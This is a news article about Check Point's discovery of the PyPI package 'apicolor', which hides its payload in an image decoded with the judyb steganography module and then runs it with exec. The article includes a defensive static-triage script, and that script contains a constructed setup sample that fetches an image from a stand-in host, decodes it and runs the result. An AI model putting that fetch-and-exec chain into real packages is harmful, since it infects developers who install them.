This random image is spreading a malicious PyPI package using GitHub

A stylized depiction of a padlocked WiFi symbol sitting in the centre of an interlocking vault.
(Image credit: Shutterstock / jijomathaidesigners)

Cybersecurity researchers from Check Point Research (CPR) have discovered a new malicious package on PyPI, the code repository for the Python programming language, which uses an image to deliver Trojan malware and relies largely on GitHub to do so.

The threat actors behind this new campaign hope that while searching the web for legitimate projects, Python developers will, sooner or later, come across ‘apicolor’. 

The seemingly benign in-development package on PyPI, once installed, first installs extra requirements on its own, and then downloads a picture from the web. Those extra requirements process the picture, and the output of that processing is then run using Python's exec command.

Steganography attack

One of those two requirements is judyb, which is in fact a steganography module, capable of revealing hidden messages within pictures. That led the researchers back to the picture, which, as it turns out, carries code that downloads malicious packages from the web to the victim's endpoint.
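The install-time chain described above (pull extra dependencies, fetch an image, recover hidden content from it, hand the result to exec) is recognisable from a package's source alone. The following static triage script is an added example written for this article; it is not Check Point's tooling and not the apicolor code. It parses a setup script with Python's ast module and flags the four stages. The sample scripts are constructed for illustration, the judyb function name used in the sample is a placeholder (the module's real API is not described on this page), and the list of steganography module names beyond judyb is an assumption.

```python
"""Static triage of a Python package's install-time code for the pattern the
article describes: installing extra dependencies at run time, fetching an image,
recovering hidden code from it and passing it to exec().

Added example; not Check Point's tooling and not the apicolor source.
"""
import ast
from dataclasses import dataclass, field

# Module names treated as steganography tooling. "judyb" comes from the
# article; the other names are assumptions added for illustration.
STEGO_MODULES = {"judyb", "stegano", "steganography"}
# Call names treated as network fetches (assumption: common stdlib/requests names).
FETCH_CALLS = {"get", "urlopen", "urlretrieve", "request"}
# Call names that run code built at run time.
DYNAMIC_EXEC = {"exec", "eval"}
# Call names through which a script can shell out to pip.
SHELL_CALLS = {"check_call", "check_output", "run", "call", "Popen", "system"}


@dataclass
class Report:
    findings: list = field(default_factory=list)
    stego_import: bool = False
    network_fetch: bool = False
    runtime_pip: bool = False
    dynamic_exec: bool = False

    def risk(self) -> str:
        # exec()/eval() of a non-literal value combined with any other stage is
        # the signature worth escalating; any single stage alone is only "medium".
        if self.dynamic_exec and (self.stego_import or self.network_fetch or self.runtime_pip):
            return "high"
        if self.dynamic_exec or self.network_fetch or self.runtime_pip:
            return "medium"
        return "low"


def _call_name(node: ast.Call) -> str:
    """Return the bare function name of a call, e.g. 'get' for requests.get(...)."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return ""


def _mentions_pip(node: ast.Call) -> bool:
    """True if any string literal inside the call's arguments mentions pip."""
    return any(
        isinstance(n, ast.Constant) and isinstance(n.value, str) and "pip" in n.value
        for n in ast.walk(node)
    )


def analyze(source: str) -> Report:
    """Parse `source` and record which stages of the chain it contains."""
    rep = Report()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            names = [a.name for a in node.names] if isinstance(node, ast.Import) else [node.module or ""]
            for name in names:
                if name.split(".")[0] in STEGO_MODULES:
                    rep.stego_import = True
                    rep.findings.append(f"line {node.lineno}: imports steganography module {name}")
        elif isinstance(node, ast.Call):
            name = _call_name(node)
            if name in DYNAMIC_EXEC and node.args and not isinstance(node.args[0], ast.Constant):
                rep.dynamic_exec = True
                rep.findings.append(f"line {node.lineno}: {name}() on a non-literal value")
            elif name in FETCH_CALLS:
                rep.network_fetch = True
                rep.findings.append(f"line {node.lineno}: network fetch via {name}()")
            elif name in SHELL_CALLS and _mentions_pip(node):
                rep.runtime_pip = True
                rep.findings.append(f"line {node.lineno}: installs packages with pip at run time")
    return rep


# Constructed sample resembling the behaviour the article describes (not the
# real apicolor source). judyb.reveal is a placeholder name for the decode call.
SUSPICIOUS_SETUP = '''
import subprocess, sys
subprocess.check_call([sys.executable, "-m", "pip", "install", "judyb", "requests"])
import requests
import judyb
img = requests.get("http://example.invalid/pic.png").content
open("pic.png", "wb").write(img)
hidden = judyb.reveal("pic.png")
exec(hidden)
'''

# Constructed ordinary setup script that should produce no findings.
BENIGN_SETUP = '''
from setuptools import setup
setup(name="harmless_pkg", version="0.1", packages=["harmless_pkg"])
'''

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        rep = analyze(src)
        print(f"{label}: risk={rep.risk()}")
        for f in rep.findings:
            print("  ", f)
```

Run it on a package's setup.py or on the module imported by the package's __init__ before installing; a "high" result is a reason to inspect the code by hand, not a verdict, since legitimate installers occasionally shell out to pip and fetch files too. The pip check only looks at string literals, so a command assembled at run time would slip past it; that is the usual limit of this kind of static triage.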

Malicious image

(Image credit: Check Point Research)

“The immediate place to investigate such packages is GitHub,” the researchers explain. “Researchers searched for code projects using these packages, enabling the team to further understand their infection techniques (if anyone mistakenly installed them and if they did, how it happened). Using this search, it became apparent that apicolor and judyb are quite niche, having low usage on GitHub projects.”

As soon as CPR notified PyPI of its findings, the latter removed the malicious package from its platform.

While the researchers did not find out who the threat actor behind this campaign was, they did say that the whole ordeal was “carefully planned and thought”, further stating that the obfuscation techniques on PyPI have evolved.

“We constantly scan PyPI for malicious packages and responsibly report them to PyPI. This one is unique and distinct from almost all the malicious packages we have encountered before,” commented Ori Abramovsky, Head of Data Science, SpectralOps, a Check Point company.

“This package differs in the way it camouflages its intent, and the way in which it targets PyPI users to infect them with malicious imports on GitHub. Our findings indicate that PyPI malicious packages and their obfuscation techniques are fast-evolving. The package we have shared here reflects careful and meticulous work. It is not the regular copy and paste that we commonly see, but what seems like a real campaign. The creation of the GitHub projects, then smartly hiding the code and downplaying the packages on PyPI, are all sophisticated work.”

Sead Fadilpašić

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.